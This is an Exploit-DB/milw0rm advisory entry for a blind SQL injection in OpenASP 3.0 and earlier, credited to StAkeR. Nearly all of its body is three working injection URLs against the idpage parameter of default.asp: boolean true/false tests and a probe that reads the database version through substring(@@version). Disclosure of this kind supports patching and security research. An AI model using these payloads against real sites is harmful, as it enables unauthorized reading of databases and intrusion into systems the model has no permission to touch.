OpenASP 3.0 - Blind SQL Injection

EDB-ID:

7137

Author:

StAkeR

Type:

webapps

Platform:

ASP

Published:

2008-11-17

/*   
    OpenASP <= 3.0 Blind SQL Injection Vulnerability
    -----------------------------------------------------
    by athos - staker[at]hotmail[dot]it 
    thanks XaDoS,anyway i've found another sql injection 
    http://openasp.it
    -----------------------------------------------------
    
    default.asp?modulo=pages&idpage=1 or 1=1 (true)
    default.asp?modulo=pages&idpage=1 or 1=2 (false)
    default.asp?modulo=pages&idpage=-1 and substring(@@version,1,1)=4/*
    
*/

# milw0rm.com [2008-11-17]